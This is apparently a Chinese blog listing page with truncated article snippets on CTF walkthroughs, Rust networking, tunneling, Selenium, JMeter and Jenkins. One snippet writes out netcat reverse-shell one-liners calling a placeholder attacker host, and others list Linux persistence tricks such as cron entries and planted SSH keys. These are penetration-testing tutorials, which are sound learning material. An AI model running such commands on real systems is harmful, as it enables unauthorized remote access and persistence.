- 2024-08-30VulNyx - Mail 靶机
扫描靶机发现22和80端口访问80端口发现id=1和2时都会有回显dirsearch-uhttp://http://192.168.200.39访问这个1和2的路径发现竟然和上面那个id=1和id=2的内容相同这里就可以判断是个include漏洞了用php_filter_chain_generator-main构造伪协议链执行rce
- 2024-08-214444
- 2024-08-140229-UDP 发送和接收
环境Time2022-11-25WSL-Ubuntu22.04Rust1.65.0前言说明参考:https://doc.rust-lang.org/std/net/struct.UdpSocket.html目标之前通过接收整个IP和UDP报文来实现了通信,这里去除报文头的细节,直接通信。main.rsUDP由标准库直接支持,可以直接使用。将发送过来的信
- 2024-08-140230-TCP 发送和接收
环境Time2022-11-25WSL-Ubuntu22.04Rust1.65.0前言说明参考:https://doc.rust-lang.org/std/net/struct.TcpListener.html目标之前认识了TCP报文头,这里去除报文头的细节,直接通信。main.rsTCP由标准库直接支持,可以直接使用。连接上去后,服务器返回一个hello。us
- 2024-05-26内网渗透-隧道搭建
一、前言为什么要进行代理搭建?因为目标主机会把一些可利用的端口给禁了,或者说内网的防火墙不允许这些端口出现,那么这时候就需要搭建一个隧道,什么是隧道,对于小白来说可能有点抽象,其实就是主机与攻击机之间的通讯端口,然后还会设计到端口转发或者是端口映射的问题。端口转发一般发
- 2024-04-11使用docker部署基于selenium和chrome-headless的爬虫
使用docker部署基于selenium和chrome-headless的爬虫无论是测试还是爬虫的一些工作,有时候都会用到selenium去对chrome执行自动化操作,这里介绍一下如何使用docker快捷方便的部署相关应用。1.selenium+chrome镜像通过dockersearchselenium我们发现,有一个docker镜像叫做sele
- 2024-03-18Jmeter性能测试 —— jmeter之使用ServerAgent监控服务器
ServerAgent性能测试时我们关注的重要指标是:并发用户数,TPS,请求成功率,响应时间,服务器的CPU,memory,I/Odisk等。Jmeter的聚合报告可以查看并发数、吞吐量、请求成功率、响应时间等;如果要查看服务器端的CPU,memory,I/Odisk等就需要安装插件ServerAgent将ServerAgent-2.2.1.jar上传
- 2024-02-204444
一.环境配置前提条件,环境准备配置远程节点,首先要保证有远程的节点,无论是虚拟机或者是实体机。新的节点要与JenkinsServer保持连接畅通slave支持远程运行,例如ssh、jnlpJenkins需要从git上获取项目,因此slave也需要与git建立联系。创建密钥对上传到gitlab中。必须有java环境
- 2023-05-20nc和ncat的特殊使用
在平常使用nc只会反弹shell,和文件传输,这里学到一些其他的使用方法记录一下反弹shell#反弹shellnc-lvp4444-e/bin/bashnc-nvtarget_iptarget_port#常用的反弹shellnc-lvp4444nc-nvattack_ipattack_port-e/bin/bash注意:在最新的netcat中,不自在-e或者
- 2023-02-09python selenium.remote远程连接时间达10分钟
问题:在机器A搭建了selenium-grid的环境,hub以4444端口号启动,并在4444下注册了子node,端口4445,浏览器配置chrome使用代码进行远程连接,并创建会话:传入的server_url= http:
- 2022-12-12Linux获取权限
目录Bash反弹shellPython反弹shell写入命令到定时任务文件写入SSH公钥 写入/etc/profile文件当我们可以在远程Linux主机上执行任
- 2022-11-27带你了解LINUX反弹Shell的各种姿势(超详细)
简介LInux反弹Shell(ReveserShell),也可以称为反向Shell,由被控制端主动向控制端发送请求建立通讯,随后将执行命令的结果输出到控制端,本质上是网络概念的客户端与服